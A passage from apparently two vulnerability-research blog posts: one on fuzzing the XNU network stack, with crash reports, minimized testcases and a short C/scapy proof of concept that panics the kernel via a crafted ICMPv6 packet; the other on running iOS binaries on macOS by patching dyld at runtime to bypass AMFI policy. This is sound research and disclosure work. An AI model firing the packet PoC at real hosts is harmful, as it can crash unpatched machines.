Β  Β  raw_ip4:Β "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

Β  }

}

data_provider:Β ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in
mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR:Β AddressSanitizer:Β attempting free on address which was notΒ malloc()-ed:Β 0x6190000079dcΒ inΒ thread T0

Β  Β  #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

Β  Β  #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36

Β  Β  #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3

Β  Β  #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3

Β  Β  #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16

Β  Β  #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3

Β  Β  #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dcΒ isΒ located 348Β bytes inside of 920-byteΒ region [0x619000007880,0x619000007c18)

allocated byΒ thread T0 here:

Β  Β  #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

Β  Β  #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10

Β  Β  #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8

Β  Β  #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15

Β  Β  #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10

Β  Β  #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10

Β  Β  #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9

Β  Β  #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11

Β  Β  #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9

Β  Β  #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10

Β  Β  #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

Β  socket {

Β  Β  domain:Β AF_MULTIPATH

Β  Β  so_type:Β SOCK_STREAM

Β  Β  protocol:Β IPPROTO_IP

Β  }

}

commands {

Β  connectx {

Β  Β  socket:Β FD_0

Β  Β  endpoints {

Β  Β  Β  sae_srcif:Β IFIDX_CASE_0

Β  Β  Β  sae_srcaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  Β  sae_dstaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β ""

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  }

Β  Β  associd:Β ASSOCID_CASE_0

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  }

}

commands {

Β  connectx {

Β  Β  socket:Β FD_0

Β  Β  endpoints {

Β  Β  Β  sae_srcif:Β IFIDX_CASE_0

Β  Β  Β  sae_dstaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β ""

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  }

Β  Β  associd:Β ASSOCID_CASE_0

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  }

}

commands {

Β  connectx {

Β  Β  socket:Β FD_0

Β  Β  endpoints {

Β  Β  Β  sae_srcif:Β IFIDX_CASE_0

Β  Β  Β  sae_srcaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β ""

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  Β  sae_dstaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  }

Β  Β  associd:Β ASSOCID_CASE_0

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  Β  flags:Β CONNECT_DATA_AUTHENTICATED

Β  }

}

commands {

Β  connectx {

Β  Β  socket:Β FD_0

Β  Β  endpoints {

Β  Β  Β  sae_srcif:Β IFIDX_CASE_0

Β  Β  Β  sae_dstaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β ""

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  }

Β  Β  associd:Β ASSOCID_CASE_0

Β  Β  flags:Β CONNECT_DATA_IDEMPOTENT

Β  }

}

commands {

Β  close {

Β  Β  fd:Β FD_8

Β  }

}

commands {

Β  ioctl_real {

Β  Β  siocsifflags {

Β  Β  Β  ifr_name:Β LO0

Β  Β  Β  flags:Β IFF_LINK1

Β  Β  }

Β  }

}

commands {

Β  close {

Β  Β  fd:Β FD_8

Β  }

}

data_provider:Β "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

Β  socket {

Β  Β  domain:Β AF_MULTIPATH

Β  Β  so_type:Β SOCK_STREAM

Β  Β  protocol:Β IPPROTO_IP

Β  }

}

commands {

Β  connectx {

Β  Β  socket:Β FD_0

Β  Β  endpoints {

Β  Β  Β  sae_srcif:Β IFIDX_CASE_1

Β  Β  Β  sae_dstaddr {

Β  Β  Β  Β  sockaddr_generic {

Β  Β  Β  Β  Β  sa_family:Β AF_MULTIPATH

Β  Β  Β  Β  Β  sa_data:Β "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte"Β # string length 131

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  }

Β  Β  associd:Β ASSOCID_CASE_0

Β  }

}

data_provider:Β ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the
AF_MULTIPATHΒ domain and called connectxΒ on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_dataΒ field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as β€œlisten” and β€œmbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous postΒ describing the β€œSockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

Β  socket {

Β  Β  domain:Β AF_INET6

Β  Β  so_type:Β SOCK_RAW

Β  Β  protocol:Β IPPROTO_IP

Β  }

}

commands {

Β  set_sock_opt {

Β  Β  level:Β SOL_SOCKET

Β  Β  name:Β SO_RCVBUF

Β  Β  val:Β "\021\000\000\000"

Β  }

}

commands {

Β  set_sock_opt {

Β  Β  level:Β IPPROTO_IPV6

Β  Β  name:Β IP_FW_ZERO

Β  Β  val:Β "\377\377\377\377"

Β  }

}

commands {

Β  ip_input {

Β  Β  tcp6_packet {

Β  Β  Β  ip6_hdr {

Β  Β  Β  Β  ip6_hdrctl {

Β  Β  Β  Β  Β  ip6_un1_flow:Β 0

Β  Β  Β  Β  Β  ip6_un1_plen:Β 0

Β  Β  Β  Β  Β  ip6_un1_nxt:Β IPPROTO_ICMPV6

Β  Β  Β  Β  Β  ip6_un1_hlim:Β 0

Β  Β  Β  Β  }

Β  Β  Β  Β  ip6_src:Β IN6_ADDR_LOOPBACK

Β  Β  Β  Β  ip6_dst:Β IN6_ADDR_ANY

Β  Β  Β  }

Β  Β  Β  tcp_hdr {

Β  Β  Β  Β  th_sport:Β PORT_2

Β  Β  Β  Β  th_dport:Β PORT_1

Β  Β  Β  Β  th_seq:Β SEQ_1

Β  Β  Β  Β  th_ack:Β SEQ_1

Β  Β  Β  Β  th_off:Β 0

Β  Β  Β  Β  th_win:Β 0

Β  Β  Β  Β  th_sum:Β 0

Β  Β  Β  Β  th_urp:Β 0

Β  Β  Β  Β  is_pure_syn:Β false

Β  Β  Β  Β  is_pure_ack:Β false

Β  Β  Β  }

Β  Β  Β  data:Β "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

Β  Β  }

Β  }

}

data_provider:Β ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#includeΒ <sys/socket.h>

#defineΒ __APPLE_USE_RFC_3542

#includeΒ <netinet/in.h>

#includeΒ <stdio.h>

#includeΒ <unistd.h>

intΒ main()Β {

Β  Β  intΒ fd =Β socket(AF_INET6,Β SOCK_RAW,Β IPPROTO_IP);

Β  Β  ifΒ (fd <Β 0)Β {

Β  Β  Β  Β  printf("failed\n");

Β  Β  Β  Β  returnΒ 0;

Β  Β  }

Β  Β  intΒ res;

Β  Β  // This is not needed to cause a crash on macOS 10.14.6, but you can

Β  Β  // try setting this option if you can't reproduce the issue.

Β  Β  // int space = 1;

Β  Β  // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));

Β  Β  // printf("res1: %d\n", res);

Β  Β  intΒ enable =Β 1;

Β  Β  res =Β setsockopt(fd,Β IPPROTO_IPV6,Β IPV6_RECVPATHMTU,Β &enable,Β sizeof(enable));

Β  Β  printf("res2: %d\n",Β res);

Β  Β  // Keep the socket open without terminating.

Β  Β  whileΒ (1)Β {

Β  Β  Β  Β  sleep(5);

Β  Β  }

Β  Β  close(fd);

Β  Β  returnΒ 0;

}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a β€œpacket too big” notification would reach the buggy code, so I used the scapyΒ library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

fromΒ scapy.all importΒ sr1,Β IPv6,Β ICMPv6PacketTooBig,Β raw

outer =Β IPv6(dst="::1")Β /Β ICMPv6PacketTooBig()Β /Β ("\x41"*40)

print(raw(outer).hex())

p =Β sr1(outer)

ifΒ p:

Β  Β  p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing β€œkernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentationΒ can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shippingΒ securityΒ regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

Fuzzing iOS code on macOS at native speed

By: Ryan
20 May 2021 at 17:07

Or how iOS apps on macOS work under the hood

Posted by Samuel Groß, Project Zero

This short post explains how code compiled for iOS can be run natively on Apple Silicon Macs.

With the introduction of Apple Silicon Macs, Apple also made it possible to run iOS apps natively on these Macs. This is fundamentally possible due to (1) iPhones and Apple Silicon Macs both using the arm64 instruction set architecture (ISA) and (2) macOS using a mostly compatible set of runtime libraries and frameworks while also providing /System/iOSSupport which contains the parts of the iOS runtime that do not exist on macOS. Due to this, it should be possible to run not just complete apps but also standalone iOS binaries or libraries on Mac. This might be interesting for a number of reasons, including:

  • It allows fuzzing closed-source code compiled for iOS on a Mac
  • It allows dynamic analysis of iOS code in a more β€œfriendly” environment

This post explains how this can be achieved in practice. The corresponding code can be found hereΒ and allows executing arbitrary iOS binaries and library code natively on macOS. The tool assumes that SIP has been disabledΒ and has been tested on macOS 11.2 and 11.3. With SIP enabled, certain steps will probably fail.

We originally developed this tool for fuzzing a 3rd-party iOS messaging app. While that particular project didn’t yield any interesting results, we are making the tool public as it could help lower the barrier of entry for iOS security research.

The Goal

The ultimate goal of this project is to execute code compiled for iOS natively on macOS. While it would be possible to achieve this goal (at least for some binaries/libraries) simply by swapping the platform identifier in the mach-o binary, our approach will instead use the existing infrastructure for running iOS apps on macOS. This has two benefits:

  1. It will guarantee that all dependent system libraries of the iOS code will exist. In practice, this means that if a dependent library does not already exist on macOS, it will automatically be loaded from /System/iOSSupport instead
  2. The runtime (OS services, frameworks, etc.) will, if necessary, emulate their iOS behavior since they will know that the process is an iOS one

To start, we’ll take a simple piece of C source code and compile it for iOS:

> cat hello.c

#include <stdio.h>

int main() {

Β  Β  puts("Hello from an iOS binary!");

Β  Β  return 0;

}

> clang -arch arm64 hello.c -o hello -isysroot \

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

> file hello

hello: Mach-O 64-bit executable arm64

> otool -l hello

…

Load command 10

Β  Β  Β  cmd LC_BUILD_VERSION

Β  cmdsize 32

Β platform 2 Β  Β  Β  Β  Β  # Platform 2 is iOS

Β  Β  minos 14.4

Β  Β  Β  sdk 14.4

Β  Β ntools 1

Β  Β  Β tool 3

Β  version 609.8

…

The Kernel

AttemptingΒ to execute the freshly compiled binary (on macOS 11.2) will simply result in

> ./hello

[1] Β  Β 13699 killed Β  Β  ./hello

While the exit status informs us that the process was terminated through SIGKILL, it does not contain any additional information about the specific reason for that. However, it does seem likely that the process is terminated by the kernel during the execve(2)Β or posix_spawn(2)Β syscall. And indeed, the crash report generated by the system states:

Termination Reason: Β  Β EXEC, [0xe] Binary with wrong platform

This error corresponds to EXEC_EXIT_REASON_WRONG_PLATFORMΒ in the kernel, and that constant is only referenced in a single function: check_for_signature:

static int

check_for_signature(proc_t p, struct image_params *imgp)

{

Β  Β  …;

#if XNU_TARGET_OS_OSX

Β Β Β Β Β Β Β Β /* Check for platform passed in spawn attr if iOS binary is being spawned */

Β Β Β Β Β Β Β Β if (proc_platform(p) == PLATFORM_IOS) {

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β struct _posix_spawnattr *psa = imgp->ip_px_sa;

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β if (psa == NULL || psa->psa_platform == 0) {

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  …;

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β  Β  signature_failure_reason = os_reason_create(OS_REASON_EXEC,

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β  Β  Β  Β  EXEC_EXIT_REASON_WRONG_PLATFORM);

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β  Β  error = EACCES;

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β  Β  goto done;

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β } else if (psa->psa_platform != PLATFORM_IOS) {

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β /* Simulator binary spawned with wrong platform */

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β signature_failure_reason = os_reason_create(OS_REASON_EXEC,

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β  Β  EXEC_EXIT_REASON_WRONG_PLATFORM);

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β error = EACCES;

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β goto done;

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β } else {

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β printf("Allowing spawn of iOS binary %s since

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  correct platform was passed in spawn\n", p->p_name);

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β }

Β Β Β Β Β Β Β Β }

#endif /* XNU_TARGET_OS_OSX */

Β  Β  …;

}

This code is active on macOS and will execute if the platform of the to-be-executed process is PLATFORM_IOS. In essence, the code checks for an undocumented posix_spawnΒ attribute, psa_platform, and in the absence of it (or if its value is not PLATFORM_IOS), will terminate the process in the way we have previously observed.

As such, to avoid EXEC_EXIT_REASON_WRONG_PLATFORM,Β it should only be necessary to use the undocumented posix_spawnattr_set_platform_npΒ syscall to set the target platform to PLATFORM_IOS, then invoke posix_spawnΒ to execute the iOS binary:

Β  Β  posix_spawnattr_t attr;

Β  Β  posix_spawnattr_init(&attr);

Β  Β  posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);

Β  Β  posix_spawn(&pid, binary_path, NULL, &attr, argv, environ);

Doing that will now result in:

> ./runner hello

...

[*] Child exited with status 5

No more SIGKILL, progress! Exit status 5 corresponds to SIGTRAP, which likely implies that the process is now terminating in userspace. And indeed, the crash report confirms that the process is crashing sometime during library initialization now.

Userspace

At this point we have a PLATFORM_IOSΒ process running in macOS userspace. The next thing that now happens is that dyld, the dynamic linker, starts mapping all libraries that the binary depends on and executes any initializers they might have. Unfortunately, one of the first libraries now being initialized, libsystem_secinit.dylib, tries to determine whether it should initialize the app sandbox based on the binary’s platform and its entitlements. The logic is roughly:

initialize_app_sandbox = False

if entitlement(β€œcom.apple.security.app-sandbox”) == True:

Β  Β  initialize_app_sandbox = True

if active_platform() == PLATFORM_IOS &&

Β  Β entitlement(β€œcom.apple.private.security.no-sandbox”) != True:

Β  Β  initialize_app_sandbox = True

As such, libsystem_secinitΒ will decide that it should initialize the app sandbox and will then contact secinitd(8), β€œthe security policy initialization daemon”, to obtain a sandbox profile. As that daemon cannot determine the app corresponding to the process in question it will fail, and libsystem_secinit.dylibΒ will then abort(3)Β the process:

(lldb) bt

* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BREAKPOINT

Β  * frame #0: libsystem_secinit.dylib`_libsecinit_appsandbox.cold.5

Β  Β  frame #1: libsystem_secinit.dylib`_libsecinit_appsandbox

Β  Β  frame #2: libsystem_trace.dylib` ...

Β  Β  frame #3: libsystem_secinit.dylib`_libsecinit_initializer

Β  Β  frame #4: libSystem.B.dylib`libSystem_initializer

Β  Β  frame #5: libdyld.dylib`...

Β  Β  frame #6: libdyld.dylib`...

Β  Β  frame #7: libdyld.dylib`dyld3::AllImages::runLibSystemInitializer

Β  Β  frame #8: libdyld.dylib`...

Β  Β  frame #9: dyld`...

Β  Β  frame #10: dyld`dyld::_main

Β  Β  frame #11: dyld`dyldbootstrap::start

Β  Β  frame #12: dyld`_dyld_start + 56

As a side note, logic like the above will turn out to be a somewhat common theme: various components responsible for the runtime environment will have special handling for iOS binaries, in which case they tend to enforce various policies more aggressively.

One possible way to solve this would be to sign the iOS binary with a self-signed (and locally trusted) code signing certificateΒ and granting it the β€œcom.apple.private.security.no-sandbox” entitlement. This would then cause libsystem_secinitΒ to not attempt to initialize the app sandbox. Unfortunately, it seems that while AppleMobileFileIntegrity (β€œamfi” - the OS component implementing various security policies like entitlement and code signing checks) will allow macOS binaries to be signed by locally-trusted code-signing certificates if SIP is disabled, it will not do so for iOS binaries. Instead, it appears to enforce roughly the same requirements as on iOS, namely that the binary must either be signed by Apple directly (in case the app is downloaded from the app store) or there must exist a valid (i.e. one signed by Apple) provisioning profileΒ for the code-signing entity which explicitly allows the entitlements. As such, this path appears like a dead end.

Another way to work around the sandbox initialization would be to use dyld interposingΒ to replace xpc_copy_entitlements_for_self, which libsystem_secinitΒ invokes to obtain the process’ entitlements, with another function that would simply return the β€œcom.apple.private.security.no-sandbox” entitlement. This would in turn prevent libsystem_secinitΒ from attempting to initialize the sandbox.

Unfortunately, the iOS process is subject to further restrictions, likely part of the β€œhardened runtime” suite, which causes dyld to disable library interposing (some more information on this mechanism is available here). This policy is also implemented by amfi, in AppleMobileFileIntegrity.kext (the kernel component of amfi):

__int64 __fastcall macos_dyld_policy_library_interposing(proc *a1, int *a2)

{

Β  int v3; // w8

Β  v3 = *a2;

Β  ...

Β  if ( (v3 & 0x10400) == 0x10000 ) Β  // flag is set for iOS binaries

Β  {

Β  Β  logDyldPolicyRejection(a1, "library interposing", "Denying library interposing for iOS app\n");

Β  Β  return 0LL;

Β  }

Β  return 64LL;

}

As can be seen, AMFI will deny library interposing for all iOS binaries. Unfortunately, I couldn’t come up with a better solution for this than to patch the code of dyld at runtime to ignore AMFI’s policy decision and thus allow library interposing. Fortunately though, doing lightweight runtime code patching is fairly easy through the use of some classic mach APIs:

  1. Find the offset of _amfi_check_dyld_policy_selfΒ in /usr/lib/dyld, e.g. with nm(1)
  2. Start the iOS process with the POSIX_SPAWN_START_SUSPENDEDΒ attribute so it is initially suspended (the equivalent of SIGSTOP). At this point, only dyld and the binary itself will have been mapped into the process’ memory space by the kernel.
  3. β€œAttach” to the process using task_for_pid
  4. Find the location of dyld in memory through vm_region_recurse_64
  5. Map dyld’s code section writable using vm_protect(VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY)Β (where VM_PROT_COPYΒ is seemingly necessary to force the pages to be copied since they are shared)
  6. Patch Β _amfi_check_dyld_policy_selfΒ through vm_writeΒ to simply return 0x5f (indicating that dyld interposing and other features should be allowed)
  7. Map dyld’s code section executable again

To be able to use the task_for_pidΒ trap, the runner binary will either need the β€œcom.apple.security.cs.debugger” entitlement or root privileges. However, as the runner is a macOS binary, it can be given this entitlement through a self-signed certificate which amfi will then allow.

As such, the full steps necessary to launch an iOS binary on macOS are:

  1. Use the posix_spawnattr_set_platform_npΒ API to set the target platform to PLATFORM_IOS
  2. Execute the new process via posix_spawn(2)Β and start it suspended
  3. Patch dyld to allow library interposing
  4. In the interposed library, claim to possess the com.apple.security.cs.debugger entitlement by replacing xpc_copy_entitlements_for_self
  5. Continue the process by sending it SIGCONT

This can now be seen in action:

> cat hello.c

#include <stdio.h>

int main() {

Β  Β  puts("Hello from an iOS binary!");

Β  Β  return 0;

}

> clang -arch arm64 hello.c -o hello -isysroot \

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk interpose.dylib

> ./runner hello

[*] Preparing to execute iOS binary hello

[+] Child process created with pid: 48302

[*] Patching child process to allow dyld interposing...

[*] _amfi_check_dyld_policy_self at offset 0x54d94 in /usr/lib/dyld

[*] /usr/lib/dyld mapped at 0x1049ec000

[+] Successfully patched _amfi_check_dyld_policy_self

[*] Sending SIGCONT to continue child

[*] Faking no-sandbox entitlement in xpc_copy_entitlements_for_self

Hello from an iOS binary!

[*] Child exited with status 0

Fuzzing

With the ability to launch iOS processes, it now becomes possible to fuzz existing iOS code natively on macOS as well. I decided to use HonggfuzzΒ for a simple PoC of this that also used lightweight coverage guidance (based on the TrapfuzzΒ instrumentation approach). The main issue with this approach is that honggfuzz uses the combination of fork(2)Β followed by execve(2)Β to create the child processes, while also performing various operations, such as dup2’ing file descriptors, setting environment variables, etc after forking but before exec’ing. However, the iOS binary must be executed through posix_spawn, which means that these operations must be performed at some other time. Furthermore, as honggfuzz itself is still compiled for macOS, some steps of the compilation of the target binary will fail (they will attempt to link previously compiled .o files, but now the platform no longer matches) and so have to be replaced. There are certainly better ways to do this (and I encourage the reader to implement it properly), but this was the approach that I got to work the quickest.

The hacky proof-of-concept patch for honggfuzz can be found here. In addition to building honggfuzz for arm64, the honggfuzz binary is subsequently signed and given the β€œcom.apple.security.cs.debugger” entitlement in order for task_for_pidΒ to work.

Conclusion

This blog post discussed how iOS apps are run on macOS and how that functionality can be used to execute any code compiled for iOS natively on macOS. This in turn can facilitate dynamic analysis and fuzzing of iOS code, and thus might make the platform a tiny bit more open for security researchers.

Β 

Attachment 1: runner.c

// clang -o runner runner.c

// cat <<EOF > entitlements.xml

// <?xml version="1.0" encoding="UTF-8"?>

